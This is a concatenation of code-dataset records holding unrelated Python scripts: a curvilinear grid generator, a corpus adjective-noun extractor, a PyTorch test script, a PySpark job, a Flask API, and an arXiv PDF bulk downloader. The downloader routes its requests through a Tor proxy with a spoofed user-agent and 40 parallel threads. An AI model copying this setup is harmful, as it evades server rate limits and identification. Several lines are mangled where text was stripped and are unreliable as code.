der=', coef_d1)\n\tprint('2nd der=', coef_d2)\n\n# ................................................................ end FD\n\n#Set the boundary values for x/y\nfor j in range(0,ny+1):\n\tx[:,j] = np.linspace(0.0,1.0,nx+1)\nAT = 0.75\ny[:,ny] = 0.5*((1.0+AT) + (AT-1.0)*np.cos(np.pi*(2.0*x[:,ny]+1.0) ) )\ny[:,0] = 1.0 - 0.5*((1.0+AT) + (AT-1.0)*np.cos(np.pi*(2.0*x[:,0]+1.0) ) )\n\nif hfnz == 1:\n\ty[:,0] = 0.\n\ny[0,:] = np.linspace(0.0,1.0,ny+1)\ny[nx,:] = np.linspace(0.0,1.0,ny+1)\n\n#Inital mesh guess\nfor j in range(1,ny):\n\tfor i in range(1,nx):\n\t\tif init == 1:\n\t\t\ty[i,j] = y[i,0] + j*(y[i,ny]-y[i,0])/float(ny)\n\t\telse:\n\t\t\ty[i,j] = 0.0 + j*1.0/float(ny)\n\n#Set hl1 and hl2 to constant grid spacing !!!\nfor k in range(0,hlo):\n\thl1[k] = 0.0 - spc*dxi*(k+1)\n\thl2[k] = 1.0 + spc*dxi*(k+1)\n\nif dbg == 1:\n\tprint('Values for halo points ')\n\tprint('hl1',hl1)\n\tprint('hl2',hl2)\n\n# No treatement for halos\nif bddf == 0 or bddf ==2 :\n\t#Initialise first values of X/Y\n\tfor j in range(0,ny+1+2*hlo):\n\t\tif j < hlo:\n\t\t\tx_old[:,j] = np.concatenate((hl1,x[:,0],hl2))\n\t\telif j>ny+hlo:\n\t\t\tx_old[:,j] = np.concatenate((hl1,x[:,ny],hl2))\t\n\t\telse:\t\n\t\t\tx_old[:,j] = np.concatenate((hl1,x[:,j-hlo],hl2))\n\n\tfor i in range(0,nx+1+2*hlo):\n\t\tif inx+hlo: \t\n\t\t\ty_old[i,:] = np.concatenate((hl1,y[nx,:],hl2))\n\t\telse:\t\n\t\t\ty_old[i,:] = np.concatenate((hl1,y[i-hlo,:],hl2))\n\n\tif bddf == 2 :\n\n\t\t#Fill halo points to cancel derivatives at the boundaries:\n\t\tfor i in range(hlo,nx+hlo+1):\n\t\t\tfor k in range(1,hlo+1):\n\t\t\t\tx_old[i,ny+hlo+k] = -coef_d1[hlo-k]/coef_d1[hlo+k]*x_old[i,ny+hlo-k]\n\t\t\t\ty_old[i,ny+hlo+k] = -coef_d1[hlo-k]/coef_d1[hlo+k]*y_old[i,ny+hlo-k]\n\n\t\t\t\tx_old[i,hlo-k] = -coef_d1[hlo+k]/coef_d1[hlo-k]*x_old[i,hlo+k]\n\t\t\t\ty_old[i,hlo-k] = -coef_d1[hlo+k]/coef_d1[hlo-k]*y_old[i,hlo+k]\t\t\t\t\n\n\t\tfor j in range(hlo,ny+hlo+1):\n\t\t\tfor k in range(1,hlo+1):\n\n\t\t\t\tx_old[nx+hlo+k,j] = -coef_d1[hlo-k]/coef_d1[hlo+k]*x_old[nx+hlo-k,j]\n\t\t\t\ty_old[nx+hlo+k,j] = -coef_d1[hlo-k]/coef_d1[hlo+k]*y_old[nx+hlo-k,j]\t\n\n\t\t\t\tx_old[hlo-k,j] = -coef_d1[hlo+k]/coef_d1[hlo-k]*x_old[hlo+k,j]\n\t\t\t\ty_old[hlo-k,j] = -coef_d1[hlo+k]/coef_d1[hlo-k]*y_old[hlo+k,j]\t\t\t\t\n\n# Make halo cells normal to boundary\t\t\t\nelif bddf == 1 :\n\t#Calculate normals at top and bot \n\tfor k in range(0,nx):\n\t\tdx_n = x[k+1,ny] - x[k,ny]\n\t\tdy_n = y[k+1,ny] - y[k,ny]\n\t\tnormn = np.sqrt( dx_n**2 + dy_n**2 )\n\t\tnt[k,0] = -dy_n/normn\n\t\tnt[k,1] = dx_n/normn\n\n\t\tnb[k,0] = -dy_n/normn\n\t\tnb[k,1] = -dx_n/normn\n\n\t\tif hfnz == 1:\n\t\t\tnb[k,0] = 0.\n\t\t\tnb[k,1] = -1.\n\n\tnt[nx,:] = nt[nx-1,:]\t\n\tnb[nx,:] = nb[nx-1,:]\t\n\n\n\tfor i in range(0,nx+1):\n\t\tfor k in range(0,hlo):\n\t\t\tx_rt[i,k] = x[i,ny] + spcx*(k+1)*deta*nt[i,0]\t\n\t\t\tx_rb[i,k] = x[i,0] + spcx*(k+1)*deta*nb[i,0]\t\n\n\tfor i in range(0,nx+1):\n\t\tfor k in range(0,hlo):\n\t\t\ty_rt[i,k] = y[i,ny] + spcy*(k+1)*deta*nt[i,1]\t\n\t\t\ty_rb[i,k] = y[i,0] + spcy*(k+1)*deta*nb[i,1]\t\n\n\tfor j in range(0,ny+1+2*hlo):\n\t\tif j < hlo:\n\t\t\tx_old[:,j] = np.concatenate((hl1,x_rb[:,j],hl2))\n\t\telif j>ny+hlo:\n\t\t\tx_old[:,j] = np.concatenate((hl1,x_rt[:,j-hlo-ny-1],hl2))\t\n\t\telse:\t\n\t\t\tx_old[:,j] = np.concatenate((hl1,x[:,j-hlo],hl2))\n\n\tfor i in range(0,nx+1+2*hlo):\n\t\tif inx+hlo: \t\n\t\t\ty_old[i,:] = np.concatenate((hl1,y[nx,:],hl2))\n\t\telse:\t\n\t\t\ty_old[i,:] = np.concatenate((y_rb[i-hlo,:],y[i-hlo,:],y_rt[i-hlo,:]))\t\t\t\n\n\n\nelif bddf == 2:\n\tprint('Changes made in the main loop')\t\t\t\t\t\t\t\t\n\nelse:\n\tprint('Select boundary halos type')\n\texit()\n\n#Init X_new\nX_new = 1*x_old\nY_new = 1*y_old\n\nprint('Point number check')\nprint('hlo =',hlo)\nprint('p =',p)\n\n# relaxation parameter [MUST be in [1,2]]\nw1 = np.float64(1.82)\nw2 = uno - w1\n\nX0 = 1*x_old\nY0 = 1*y_old\n\nif dbg == 1:\n\tprint('Dimensions')\n\tprint('nxmax = ',nxmax)\n\tprint('nymax = ',nymax)\n\n\n# ................................................................ START MAIN LOOP\n#Iterate with SOR\nprint('Iteration and error')\nwhile it < nsmx and norm > tol:\n\n\tX0_old = 1*X0\n\tY0_old = 1*Y0\n\terr_x = 0.\n\terr_y = 0.\t\n\n\tif bddf == 2:\n\t\t#Fill halo points to cancel derivatives at the boundaries:\n\t\tfor i in range(hlo,nx+hlo+1):\n\t\t\tfor k in range(1,hlo+1):\n\t\t\t\tX_new[i,ny+hlo+k] = -coef_d1[hlo-k]/coef_d1[hlo+k]*X0[i,ny+hlo-k]\n\t\t\t\tY_new[i,ny+hlo+k] = -coef_d1[hlo-k]/coef_d1[hlo+k]*Y0[i,ny+hlo-k]\n\n\t\t\t\tX_new[i,hlo-k] = -coef_d1[hlo+k]/coef_d1[hlo-k]*X0[i,hlo+k]\n\t\t\t\tY_new[i,hlo-k] = -coef_d1[hlo+k]/coef_d1[hlo-k]*Y0[i,hlo+k]\t\t\t\t\n\n\t\tfor j in range(hlo,ny+hlo+1):\n\t\t\tfor k in range(1,hlo+1):\n\n\t\t\t\tX_new[nx+hlo+k,j] = -coef_d1[hlo-k]/coef_d1[hlo+k]*X0[nx+hlo-k,j]\n\t\t\t\tY_new[nx+hlo+k,j] = -coef_d1[hlo-k]/coef_d1[hlo+k]*Y0[nx+hlo-k,j]\t\n\n\t\t\t\tX_new[hlo-k,j] = -coef_d1[hlo+k]/coef_d1[hlo-k]*X0[hlo+k,j]\n\t\t\t\tY_new[hlo-k,j] = -coef_d1[hlo+k]/coef_d1[hlo-k]*Y0[hlo+k,j]\t\t\t\t\t\t\n\n\n\t#Grid control coefficients\n\tif gctl == 1:\n\n\t\t#Prepare the grid control functions at boundaries \n\t\t#BOT\n\t\tfor i in range(hlo,nx+hlo+1):\n\n\t\t\tx_hb = X0_old[i-hlo:i+hlo+1,hlo]\n\t\t\ty_hb = Y0_old[i-hlo:i+hlo+1,hlo]\n\t\t\tx_vb = X0_old[i,0:2*hlo+1]\n\t\t\ty_vb = Y0_old[i,0:2*hlo+1]\n\n\t\t\talpha = (np.dot(coef_d1,x_vb)/deta)**2 + (np.dot(coef_d1,y_vb)/deta)**2\n\t\t\tbeta = np.dot(coef_d1,x_vb)/deta*np.dot(coef_d1,x_hb)/dxi + np.dot(coef_d1,y_vb)/deta*np.dot(coef_d1,y_hb)/dxi\t\n\t\t\tgamma = (np.dot(coef_d1,x_hb)/dxi)**2 + (np.dot(coef_d1,y_hb)/dxi)**2\n\n\t\t\tJ = np.dot(coef_d1,x_hb)/dxi*np.dot(coef_d1,y_vb)/deta - np.dot(coef_d1,x_vb)/deta *np.dot(coef_d1,y_hb)/dxi\n\t\t\tA = alpha/dxi**2*np.dot(coef_d2,x_hb) + gamma/deta**2*np.dot(coef_d2,x_vb)\n\t\t\tB = alpha/dxi**2*np.dot(coef_d2,y_hb) + gamma/deta**2*np.dot(coef_d2,y_vb)\n\t\t\ts_eta = 1.0 #dsbt/deta\n\n\t\t\tden = np.sqrt(gamma)\n\n\t\t\tx_eta = -s_eta*np.dot(coef_d1,y_hb)/dxi/den\n\t\t\ty_eta = s_eta*np.dot(coef_d1,x_hb)/dxi/den\n\n\t\t\tphi[i,hlo] = 0. #(B*x_eta-A*y_eta)/J**3\n\t\t\tpsi[i,hlo] = 0. #(A*np.dot(coef_d1,y_hb)/dxi - B*np.dot(coef_d1,x_hb)/dxi)/J**3\n\n\t\t#TOP\n\t\tfor i in range(hlo,nx+hlo+1):\n\n\t\t\tx_hb = X0_old[i-hlo:i+hlo+1,hlo+ny]\n\t\t\ty_hb = Y0_old[i-hlo:i+hlo+1,hlo+ny]\n\t\t\tx_vb = X0_old[i,ny:ny+2*hlo+1]\n\t\t\ty_vb = Y0_old[i,ny:ny+2*hlo+1]\n\n\t\t\talpha = (np.dot(coef_d1,x_vb)/deta)**2 + (np.dot(coef_d1,y_vb)/deta)**2\n\t\t\tbeta = np.dot(coef_d1,x_vb)/deta*np.dot(coef_d1,x_hb)/dxi + np.dot(coef_d1,y_vb)/deta*np.dot(coef_d1,y_hb)/dxi\t\n\t\t\tgamma = (np.dot(coef_d1,x_hb)/dxi)**2 + (np.dot(coef_d1,y_hb)/dxi)**2\n\n\t\t\tJ = np.dot(coef_d1,x_hb)/dxi*np.dot(coef_d1,y_vb)/deta - np.dot(coef_d1,x_vb)/deta *np.dot(coef_d1,y_hb)/dxi\n\t\t\tA = alpha/dxi**2*np.dot(coef_d2,x_hb) + gamma/deta**2*np.dot(coef_d2,x_vb)\n\t\t\tB = alpha/dxi**2*np.dot(coef_d2,y_hb) + gamma/deta**2*np.dot(coef_d2,y_vb)\n\t\t\ts_eta = 0.9 #dstp/deta\n\n\t\t\tden = np.sqrt(gamma)\n\n\t\t\tx_eta = -s_eta*np.dot(coef_d1,y_hb)/dxi/den\n\t\t\ty_eta = s_eta*np.dot(coef_d1,x_hb)/dxi/den\n\n\t\t\tphi[i,hlo+ny] = (B*x_eta-A*y_eta)/J**3\n\t\t\tpsi[i,hlo+ny] = (A*np.dot(coef_d1,y_hb)/dxi - B*np.dot(coef_d1,x_hb)/dxi)/J**3\t\t\t\n\n\t\t#Fix distribution within the domain \n\t\tfor i in range(hlo,nx+hlo):\n\t\t\tfor j in range(hlo,ny+hlo):\n\t\t\t\tphi[i,j] = phi[i,hlo]*(1.-(eta[j-hlo]))**a_pl + phi[i,hlo+ny]*(eta[j-hlo])**b_pl\n\t\t\t\tpsi[i,j] = psi[i,hlo]*(1.-(eta[j-hlo]))**c_pl + psi[i,hlo+ny]*(eta[j-hlo])**d_pl\t\n\n\t#Main loop over interior points \n\tfor j in range(hlo+1,ny+hlo):\n\t\tfor i in range(hlo,nx+hlo+1):\n\n\t\t\t\t#Prepare coeffs\n\t\t\t\tx_h = X0[i-p:i+p+1,j]\n\t\t\t\tx_v = X0[i,j-p:j+p+1]\n\t\t\t\ty_h = Y0[i-p:i+p+1,j]\n\t\t\t\ty_v = Y0[i,j-p:j+p+1]\n\n\t\t\t\talpha = (np.dot(coef_d1,x_v)/deta)**2 + (np.dot(coef_d1,y_v)/deta)**2\n\t\t\t\tbeta = np.dot(coef_d1,x_v)/deta*np.dot(coef_d1,x_h)/dxi + np.dot(coef_d1,y_v)/deta*np.dot(coef_d1,y_h)/dxi\t\n\t\t\t\tgamma = (np.dot(coef_d1,x_h)/dxi)**2 + (np.dot(coef_d1,y_h)/dxi)**2\n\t\t\t\t\n\t\t\t\t#Prepare cross-derivative \n\t\t\t\tx_hv = X0[i-p:i+p+1,j-p:j+p+1]\n\t\t\t\ty_hv = Y0[i-p:i+p+1,j-p:j+p+1]\n\n\t\t\t\t#Remove xij/yij from previous\n\t\t\t\tx_h[p] = zro\n\t\t\t\tx_v[p] = zro\n\t\t\t\ty_h[p] = zro\n\t\t\t\ty_v[p] = zro\n\t\t\t\tx_hv[p,p] = zro\n\t\t\t\ty_hv[p,p] = zro\n\n\t\t\t\t#Prepare various terms \n\t\t\t\tterm1x = alpha/dxi**2*np.dot(coef_d2,x_h) \n\t\t\t\tterm2x = -2.*beta/deta/dxi*np.dot( coef_d1, np.dot(coef_d1,x_hv) )\n\t\t\t\tterm3x = gamma/deta**2*np.dot(coef_d2,x_v)\n\n\t\t\t\tterm1y = alpha/dxi**2*np.dot(coef_d2,y_h) \n\t\t\t\tterm2y = -2.*beta/deta/dxi*np.dot( coef_d1, np.dot(coef_d1,y_hv) )\n\t\t\t\tterm3y = gamma/deta**2*np.dot(coef_d2,y_v) \n\n\t\t\t\t#Grid control terms\n\t\t\t\tif gctl == 1:\n\t\t\t\t\tJ = np.dot(coef_d1,x_h)/dxi*np.dot(coef_d1,y_v)/deta - np.dot(coef_d1,x_v)/deta *np.dot(coef_d1,y_h)/dxi \n\t\t\t\t\tterm1x = term1x + J**2*( phi[i,j]*np.dot(coef_d1,x_h)/dxi + psi[i,j]*np.dot(coef_d1,x_v)/deta)\n\t\t\t\t\tterm1y = term1y + J**2*( phi[i,j]*np.dot(coef_d1,y_h)/dxi + psi[i,j]*np.dot(coef_d1,y_v)/deta)\n\t\n\t\t\t\t#Lead coeff\n\t\t\t\tcoef_l = alpha/dxi**2*coef_d2[p] - 2.*beta/deta/dxi*coef_d1[p]**2 +gamma/deta**2*coef_d2[p]\n\n\t\t\t\t#Compute xij/yij\n\t\t\t\tx_updt = 0.\n\t\t\t\ty_updt = 0.\n\n\t\t\t\tx_updt = -1./coef_l*(term1x + term2x + term3x)\n\t\t\t\ty_updt = -1./coef_l*(term1y + term2y + term3y)\n\n\t\t\t\t#Error\n\t\t\t\tif i > hlo and i < nx + hlo :\n\t\t\t\t\tif abs(x_updt - X0_old[i,j]) > err_x:\n\t\t\t\t\t\terr_x = abs(x_updt - X0_old[i,j])/abs(X0_old[i,j]) #/abs(x_updt)\n\t\t\t\tif abs(y_updt - Y0_old[i,j]) > err_y:\n\t\t\t\t\terr_y = abs(y_updt - Y0_old[i,j])/abs(Y0_old[i,j]) #/abs(y_updt)\n\n\t\t\t\t#Update X_new / Y_new\n\t\t\t\tif i > hlo and i < nx + hlo:\n\t\t\t\t\tX_new[i,j] = x_updt\n\t\t\t\telse:\n\t\t\t\t\tX_new[i,j] = X0_old[i,j]\n\t\t\t\tY_new[i,j] = y_updt\n\t\t\t\t\t\n\n\t#Check convergence tolerance\n\tnorm = max(err_x,err_y)\n\n\t#Replace old grid\n\t# X_new = w1*X_new + w2*X0\n\t# Y_new = w1*Y_new + w2*Y0\n\n\tX0 = X_new\n\tY0 = Y_new\n\n\t#Advance step\n\tit = it + 1\n\tif it % 20 == 0 :\n\t\tprint(it, norm, end=\"\\r\" )\n\nif it >= nsmx : \n\tprint(' ')\n\tprint('WARNING')\n\tprint('Exited loop because max iterations achieved')\n\tprint('Last it =',it )\n\nprint('' )\nprint('Final step and error')\t\nprint('it = ',it)\nprint('err = ',norm)\n\n#Put back into xnew \nx_new = 1*X_new\ny_new = 1*Y_new\n\n# -----------------------------------------------------------------------------------#\n# Output: visualise the results\n\nif f1sh == 1:\n\n\tfig = plt.figure()\n\n\t#First plot: eta vs xi\n\tax1 = fig.add_subplot(121,aspect='equal')\n\tax1.set(xlabel=r'$\\xi$',ylabel=r'$\\eta$')\n\tfor i in range(0,nx+1):\n\t\tvert = np.linspace(xi[i],xi[i],eta.size)\n\t\tax1.plot(vert,eta,ls='-',color='black')\n\tfor j in range(0,ny+1):\t\n\t\thori = np.linspace(eta[j],eta[j],xi.size)\n\t\tax1.plot(xi,hori,ls='-',color='black')\n\n\tif st == 1 :\n\t\tax1.set_title('Computational space')\t\n\n\n\t#First plot: y v x \n\tax2 = fig.add_subplot(122,aspect='equal')\n\tax2.set(xlabel=r'$x$',ylabel=r'$y$')\n\tfor i in range(0,nx+1):\n\t\tax2.plot(x[i,:],y[i,:],ls='-',color='black')\n\tax2.plot(x[0,:],y[0,:],ls='-',color='red')\t\n\tax2.plot(x[nx,:],y[nx,:],ls='-',color='red')\t\n\tfor j in range(0,ny+1):\t\n\t\tax2.plot(x[:,j],y[:,j],ls='-',color='black')\n\tax2.plot(x[:,0],y[:,0],ls='-',color='red')\n\tax2.plot(x[:,ny],y[:,ny],ls='-',color='red')\n\tax2.yaxis.tick_right()\n\t\n\n\tif st == 1:\n\t\tax2.set_title('Physical space')\t\n\n\n\tfig.savefig('comp_phys_space.eps',format='eps',dpi=dpi)\n\t\n\nif f2sh == 1 :\n\n\tfig2 = plt.figure()\n\n\t#First plot: xini vs yini\n\tax21 = fig2.add_subplot(121,aspect='equal')\n\tax21.set(xlabel=r'$x$',ylabel=r'$y$')\n\tfor i in range(0,nx+1):\n\t\tax21.plot(x[i,:],y[i,:],ls='-',color='black')\n\tax21.plot(x[0,:],y[0,:],ls='-',color='red')\t\n\tax21.plot(x[nx,:],y[nx,:],ls='-',color='red')\t\t\n\tfor j in range(0,ny+1):\t\n\t\tax21.plot(x[:,j],y[:,j],ls='-',color='black')\n\tax21.plot(x[:,0],y[:,0],ls='-',color='red')\n\tax21.plot(x[:,ny],y[:,ny],ls='-',color='red')\t\n\n\tif st == 1 :\n\t\tax21.set_title('Initial guess')\t\n\n\n\t#Second plot: y v x \n\tax22 = fig2.add_subplot(122,aspect='equal')\n\tax22.set(xlabel=r'$x$',ylabel=r'$y$')\n\tfor i in range(0,nx+2*hlo+1):\n\t\tax22.plot(x_new[i,p:ny+1+p],y_new[i,p:ny+1+p],ls='-',color='black')\n\tfor j in range(0,ny+2*hlo+1):\t\n\t\tax22.plot(x_new[p:nx+1+p,j],y_new[p:nx+1+p,j],ls='-',color='black')\n\tax22.plot(x[:,0],y[:,0],ls='-',color='red')\n\tax22.plot(x[:,ny],y[:,ny],ls='-',color='red')\t\n\tax22.plot(x[0,:],y[0,:],ls='-',color='red')\t\n\tax22.plot(x[nx,:],y[nx,:],ls='-',color='red')\t\t\n\tax22.yaxis.tick_right()\n\n\tif st == 1:\n\t\tax22.set_title('Iterated solution')\t\n\n\tfig2.savefig('init_conv.eps',format='eps',dpi=dpi)\t\n\n\n#Shw figure\nif sf == 1:\n\n\tplt.show()\n\n# -----------------------------------------------------------------------------------#","sub_path":"curv_mesh/grid_generation/grid_1.py","file_name":"grid_1.py","file_ext":"py","file_size_in_byte":17609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"81682298","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n#\n# was adjnoun.py\n#\n\n# program to extract data about nouns modified by colour adjectives from the BNC\n# created gbt, July 2011\n# modified mcg, 2012/01/23\n\n### import\n\n# gbt's modules:\nimport sys\nfrom datetime import datetime\nfrom classes4bnc import Pair, Node, Sentence \nimport pandas as pd\n#from classes4bnc import *# import defined classes (same namespace!)\n### from generalfuncs import *\nfinal_list = []\n### functions ###\ndef yield_lines(list_line):\n \n final_list.append(list_line)\n return final_list\n\ndef token_type(token):\n token_begin = token[:3]\n if token == \"\": # empty line\n return False\n elif token_begin == \"\":\n return \"sentencebegin\"\n elif token_begin == \" -1:\n listTup[num].add1()\n #print(listTup[num].tup[0]+ \"-\" + listTup[num].tup[1] + \" has been found \" + str(listTup[num].getNum()) + \" times\")\n else:\n listTup.append(Pair(act))\n #print(listTup[num].tup[0]+ \"-\" + listTup[num].tup[1] + \" has been found for the first time\")\n\ndef process_bnc_mod():\n i = 0\n s_id = 0\n within_sent = False\n limit = 10000#124529467 number of tokens in bnc.xml plus two\n #limit = 1000000\n bnc = open(home + 'bnc.xml', 'r')\n while i < limit:\n if(i%25000 == 0) and (i != 0):\n print(\"Processed \" + str(i) + \" lines\")\n if(i%1245294 == 0):\n print(\"Processed \" + str(i) + \" from \" + str(limit) + \" lines, (\" + str((i/limit)*100) + \"%)\")\n i = i + 1\n iamin = \"token: \" + str(i)+ \"\\n\\t\"\n line = bnc.readline()\n if token_type(line) == \"sentencebegin\": # count sentences\n if within_sent == True: # errors in the corpus coding...\n pass\n else:\n within_sent = True\n s_id=s_id+1\n newsent = Sentence(s_id) # sentence id\n elif token_type(line) == \"sentenceend\": # process sentence and flush\n within_sent = False # finish sentence\n try:\n newsent.assign_parents()\n except:\n msg = iamin + str(newsent) + \"\\n\"\n sys.stderr.write(msg)\n anlist = find_an(newsent) # returns list with a and n\n for tupla in anlist:\n checkList(tupla)\n del(newsent)\n elif token_type(line) == \"word\":\n itemlist = line.split()\n yield_lines(itemlist)\n #burada liste olarak itemler geliyor\n try:\n node = Node(atts=itemlist)\n except:\n msg = iamin + str(newsent) + \"\\n\"\n sys.stderr.write(msg)\n newsent.append_node(node)\n elif token_type(line) == False:\n sys.stderr.write(\"* Reached EOF *\\n\")\n break\n bnc.close()\n msg = \"Done! Number of sentences processed: \" + str(s_id) + \", and tokens: \" + str(i) + \"\\n\"\n sys.stderr.write(msg)\n #return freq_of\n \n### main ###\n\n### global variables\nhome = '/Users/hmtkv/Google Drive/Yeni/UPF/Classes!/Comp Sem/Project/data/'\n#dropbox = home + 'Dropbox/distsem/'\n#nounlistfile = dropbox + 'data/head_nouns/nounswithcolouradjs.txt'\ncsvfile = home + 'output.csv'\n\n# *** TO DO: separate freq_of from selected_nouns ***\nminfreq = 0 # make it a user-controlable parameter for the script?\nlistTup = []\n\na = datetime.now()\nprint(\"[Begin]\")\n\nprint(\"Let's start...\")\nprocess_bnc_mod()\n\nof = open(csvfile, 'w')\nof.flush()\ntext = \"Adj;Noun;Occurrences\\n\"\nof.write(text)\n#for i,line in enumerate(lines):\n # if i < 2: continue\n #foo(line)\nfor el in listTup:\n if(el.getNum() >= minfreq):\n #tam sayıyı aldırma => str(el)[-2:]\n print(str(el) + \" appears \" + str(el).split(\";\")[1] + \" times(min frequency=\", minfreq,\")it's added to the output list\")\n info = str(el)\n of.write(info +\"\\n\")\n\ncsv_data = home + 'sample_data.csv'\n#1-------------------------------------\n#pof.flush()\n#for lines in final_list:\n# pof = open(csv_data, 'w')\n# text = str(lines)\n# pof.write(text)\n# pof.write(\"\\n\")\n# pof.close()\n\n#2-------------------------------------\ndf = pd.DataFrame(final_list)\ndf.to_csv(csv_data, sep=',',index=False)\n\n \n\n\nb = datetime.now()\n\nof.close()\nprint(\"Process finished!\")\nc = b - a\nprint(\"Time spent (sec):\" + str(c.seconds))\nprint(csvfile + \" created!\")\nprint(\"[End]\")\n\n","sub_path":"xtract-data-from-corpus.py","file_name":"xtract-data-from-corpus.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"400785991","text":"from model import ZeroNet\nimport torch\nfrom data_utils import STL10Loader\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nmodel = ZeroNet(num_classes=10)\nPATH = 'saved_model'\nmodel.load_state_dict(torch.load(PATH, map_location=device))\n\nstl10 = STL10Loader()\ntest_loader = stl10.get_loader('test')\n\nwith torch.no_grad():\n model = model.to(device)\n model.eval()\n cnt = 0\n correct = 0\n for batch_index, (X, y) in enumerate(test_loader):\n X, y = X.to(device), y.to(device)\n scores = model(X)\n predict = scores.argmax(dim=-1)\n correct += predict.eq(y.view_as(predict)).cpu().sum()\n cnt += predict.size(0)\n\n test_progress = 'Progress: [{}/{} ({:.0f}%)]'.format(\n (batch_index+1), len(test_loader), 100. * (batch_index+1) / len(test_loader))\n print(test_progress, end='\\r')\n print()\n\n test_acc = correct.cpu().item()/cnt*100\n print(\"Test accuracy: {:.2f}%\".format(test_acc))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"2344923","text":"#!/usr/bin/python3\nimport os\nimport time\nimport pickle\nimport shutil\nimport random\nimport urllib\nimport requests\nimport concurrent.futures\nimport gc\nfrom urllib.request import urlopen\nfrom termcolor import colored\nfrom utils import Config, safe_pickle_dump\n\nprintgreen = lambda q: print(colored(q, 'green'))\nprintred = lambda q: print(colored(q, 'red'))\n\nimport signal\nimport sys\ndef signal_handler(sig, frame):\n printred('Program interrupted, saving database...')\n safe_pickle_dump(db, Config.db_path)\n printgreen('Saved, now exiting')\n sys.exit(0)\nsignal.signal(signal.SIGINT, signal_handler)\n\n\nsession = requests.session()\nsession.proxies = {\n 'http': 'socks5://localhost:9050',\n 'https': 'socks5://localhost:9050'\n}\nheaders = {\n 'User-agent': 'HotJava/1.1.2 FCS'\n}\n\ndb = pickle.load(open(Config.db_path, 'rb'))\n\ndef refreshNeeded():\n have = set(os.listdir(Config.pdf_dir))\n print(\"Database Size: %d \\nNumber of current PDFs: %d\" % (len(db), len(have)) )\n print(\"Number of entries not downloaded: %d\" % int(len(db) - len(have)))\n entries = []\n numhtml = 0\n for db_key, j in db.items():\n pdfs = [x['href'] for x in j['links'] if x['type'] == 'application/pdf']\n assert len(pdfs) == 1\n if ('ishtml' in db[db_key] and db[db_key]['ishtml'] == True):\n numhtml = numhtml + 1\n #print(db_key)\n continue\n pdf_url = pdfs[0] + '.pdf'\n basename = pdf_url.split('/')[-1]\n fname = os.path.join(Config.pdf_dir, basename)\n if not basename in have:\n entries.append({\n 'key': db_key,\n 'url': pdf_url,\n 'basename': basename,\n 'filename': fname\n })\n print(\"Number of entries that only returned an HTML page: %d\" % numhtml)\n print(\"Number of new entries to be downloaded: %d\" % len(entries))\n return entries\n\n\n\n\ndef load_url(pdf_url):\n return session.get(pdf_url, timeout = 30)\n\ndef reqToFile(db_key, basename, filename, req):\n if ('ishtml' in db[db_key] and db[db_key]['ishtml'] == True):\n return\n if (req.ok and req.headers['Content-Type'] == 'application/pdf'):\n with open(filename, 'wb') as f:\n f.write(req.content)\n print(\".\", end='', flush=True)\n db[db_key]['ishtml'] = False\n elif ('text/html' in req.headers['Content-Type']):\n db[db_key]['ishtml'] = True\n raise ValueError(f\"{db_key}: was HTML instead of PDF\")\n else:\n raise Exception(f\"{db_key}: Unknown error\")\n\n\nbatch_size = 2500\nnewEntries = refreshNeeded()\nwith concurrent.futures.ThreadPoolExecutor(max_workers=40) as executor:\n while(len(newEntries) > 0):\n batch = newEntries[0:batch_size]\n print(\"New batch, number of new entries to download: %d\" % len(batch))\n future_to_url = { executor.submit(load_url, entry['url']): entry for entry in batch }\n for future in concurrent.futures.as_completed(future_to_url):\n if(random.randrange(0, 100) > 98):\n safe_pickle_dump(db, Config.db_path)\n print(\"Database saved.\")\n try:\n this_entry = future_to_url[future]\n req = future.result()\n reqToFile(this_entry['key'], this_entry['basename'], this_entry['filename'], req)\n except Exception as e:\n print('')\n print(e)\n print('')\n printgreen('Batch done, saving database.')\n safe_pickle_dump(db, Config.db_path)\n newEntries = refreshNeeded()\n gc.collect()\n\nprint(\"Done, saving database.\")\nsafe_pickle_dump(db, Config.db_path)\n","sub_path":"tor_download.py","file_name":"tor_download.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"198164418","text":"from pyspark import SparkContext, SQLContext\nfrom pyspark.sql import *\n\nsc = SparkContext()\nsqlContext = SQLContext(sc)\n\norderItemLine = sc.textFile(\"hdfs://localhost:8020/user/cloudera/problem9/data/orderItems\")\norderItem = orderItemLine.map(lambda x: x.split(\"|\"))\norderItemSchema = orderItem.map(lambda x: Row(order_item_id=int(x[0]),\n order_item_order_id=int(x[1]),\n order_item_product_id=int(x[2]),\n order_item_quantity=int(x[3]),\n order_item_subtotal=float(x[4]),\n order_item_product_price=float(x[5])))\n\norderDF = sqlContext.createDataFrame(orderItemSchema)\n# orderDF.show()\norderDF.registerTempTable(\"orders\")\ndf_output = sqlContext.sql(\"select order_item_product_id, order_item_product_price, sum(order_item_quantity) as total_quantity from orders group by order_item_product_id, order_item_product_price\")\n# df_output.show()\ndf_output.coalesce(1).write.option(\"compression\",\"SNAPPY\").parquet(\"hdfs://localhost:8020/user/cloudera/problem9/solution\")\n\n\n","sub_path":"Set-2/q9-2.py","file_name":"q9-2.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"48752827","text":"from flask import Flask\nfrom flask_restful import Api\nfrom sql_alchemy import db\nfrom Resources.cats import Cats, Cat\n\napp = Flask(__name__)\napi = Api(app)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///banco.db'\n\n@app.before_first_request\ndef cria_banco():\n db.create_all()\n\napi.add_resource(Cats, \"/cats\")\napi.add_resource(Cat, \"/cats/\")\n\nif __name__ == \"__main__\":\n\tdb.init_app(app)\n\tapp.run(debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"425873829","text":"import datetime\nfrom libs.configs import getConfig\nimport trendln\nimport numpy as np\nimport pandas as pd\n\n\nclass Calculation:\n def __init__(self, 